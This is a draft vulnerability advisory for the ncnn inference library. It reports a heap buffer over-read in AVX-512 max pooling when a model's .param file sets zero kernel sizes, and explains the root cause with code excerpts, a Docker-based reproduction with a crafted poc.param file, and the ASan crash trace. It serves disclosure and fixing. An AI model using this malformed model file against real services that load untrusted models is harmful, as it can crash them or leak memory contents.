All advisories
Draft

AVX-512 Pooling Heap Buffer Over-Read

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

AVX-512 Pooling Heap Buffer Over-Read

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/pooling_x86.cpp:207 in Pooling_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

A .param file that declares a max-Pooling layer with zero kernel dimensions makes the AVX-512 pooling path compute an output one row and one column larger than the input, then load 64 bytes from a position past the end of the packed input buffer. The over-read crashes the process under ASan and otherwise feeds uninitialised memory into the pooling result. The PoC uses ncnnoptimize, which reaches the layer during ModelWriter::shape_inference() after loading the model.

Detail

The untrusted fields are kernel_w (parameter id 1) and kernel_h (parameter id 11). Pooling::load_param() accepts zero for both — the default for kernel_w is itself 0 — and neither the generic nor the x86 implementation rejects a zero-sized pooling window.

The output extents are computed from the padded input as (w - kernel_w) / stride_w + 1. With a zero kernel that formula yields w / stride_w + 1, one step more than the input actually holds, and the max-pooling loop indexes the input at those out-of-range positions:

// src/layer/x86/pooling_x86.cpp:153
        int outw = (w - kernel_w) / stride_w + 1;
        int outh = (h - kernel_h) / stride_h + 1;

        top_blob.create(outw, outh, channels, elemsize, elempack, opt.blob_allocator);
        if (top_blob.empty())
            return -100;

        const int maxk = kernel_w * kernel_h;
// src/layer/x86/pooling_x86.cpp:203
                    for (int j = 0; j < outw; j++)
                    {
                        const float* sptr = m.row(i * stride_h) + j * stride_w * 16;

                        __m512 _max = _mm512_loadu_ps(sptr);

The PoC uses a 32 x 32 input and pooling_type=0, kernel_w=0, kernel_h=0, stride_w=1 (with stride_h defaulting to stride_w). On an AVX-512 build the blob is packed 16-deep, so the layer sees w = 32 and h = 2 packed rows over a 4096-byte payload — the 4164-byte region ASan reports.

outw becomes (32 - 0) / 1 + 1 = 33 and outh becomes (2 - 0) / 1 + 1 = 3, so i reaches 2 and j reaches 32, one past each real extent. m.row(i * stride_h) + j * stride_w * 16 therefore points beyond the packed input, and the unconditional _mm512_loadu_ps(sptr) at line 207 reads 16 floats from there. maxk is 0 * 0 = 0, so the inner accumulation loop never runs and this initial load is the only access — and it is the one ASan reports, 0 bytes past the end of the input allocation.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-avx-512-pooling-heap-buffer-over-read && cd ncnn-poc-avx-512-pooling-heap-buffer-over-read

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'POC_EOF'
7767517
2 2
Input data 0 1 data 0=32 1=32
Pooling pool 1 1 data out 1=0 11=0 2=1
POC_EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x521000063d40 at pc 0x623549198d12 bp 0x7ffdf8ecd170 sp 0x7ffdf8ecd160
READ of size 64 at 0x521000063d40 thread T0
    #0 0x623549198d11 in _mm512_loadu_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342
    #1 0x623549198d11 in ncnn::Pooling_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/pooling_x86_avx512.cpp:207
    #2 0x623545a31f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #3 0x623545a23b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #4 0x623545a839e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #5 0x6235459153c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #6 0x623545992eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #7 0x75e865d211c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x75e865d2128a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x623545912624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x521000063d44 is located 0 bytes after 4164-byte region [0x521000062d00,0x521000063d44)
allocated by thread T0 here:
    #0 0x75e86639af1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x6235459a768e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x6235459a768e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x6235459e64b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
    #4 0x6235459e9f5b in ncnn::Mat::create(int, int, unsigned long, int, int, ncnn::Allocator*) /ncnn/src/mat.cpp:716
    #5 0x62354b5904dd in ncnn::Packing_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/packing_x86_avx512.cpp:113
    #6 0x6235459b9da8 in ncnn::Layer_final::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer.cpp:366
    #7 0x6235459fb8b9 in ncnn::convert_packing(ncnn::Mat const&, ncnn::Mat&, int, ncnn::Option const&) /ncnn/src/mat.cpp:2287
    #8 0x623545a25c19 in ncnn::NetPrivate::convert_layout(ncnn::Mat&, ncnn::Layer const*, ncnn::Option const&) const /ncnn/src/net.cpp:524
    #9 0x623545a2b645 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:650
    #10 0x623545a23b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #11 0x623545a839e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #12 0x6235459153c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #13 0x623545992eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #14 0x75e865d211c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #15 0x75e865d2128a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #16 0x623545912624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342 in _mm512_loadu_ps(void const*)

Credit

Zheng Yu @ DepthFirst